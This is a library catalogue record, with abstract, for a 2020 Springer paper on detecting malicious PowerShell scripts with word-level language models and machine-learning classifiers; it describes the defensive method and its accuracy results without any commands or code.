Portal de Periódicos da CAPES

Detection of Malicious PowerShell Using Word-Level Language Models

2020; Springer Science+Business Media; Linguagem: Inglês

10.1007/978-3-030-58208-1_3

1611-3349

Yui Tajiri, Mamoru Mimura,

Spam and Phishing Detection

There is a growing tendency for cybercriminals to abuse legitimate tools installed on the target computers for cyberattacks. In particular, the use of PowerShell provided by Microsoft has been increasing every year and has become a threat. In previous studies, a method to detect malicious PowerShell commands using character-level deep learning was proposed. The proposed method combines traditional natural language processing and character-level convolutional neural networks. This method, however, requires time for dynamic analysis. This paper proposes a method to classify unknown PowerShell without dynamic analysis. Our method uses feature vectors extracted from malicious and benign PowerShell scripts using word-level language models for classification. The datasets were generated from benign and malicious PowerShell scripts obtained from Hybrid Analysis, and benign PowerShell scripts obtained from GitHub, which are imbalanced. The experimental result shows that the combination of the LSI and XGBoost produces the highest detection rate. The maximum accuracy achieves approximately 0.95 on the imbalanced dataset. Furthermore, over 50% of unknown malicious PowerShell scripts could be detected in time series analysis without dynamic analysis.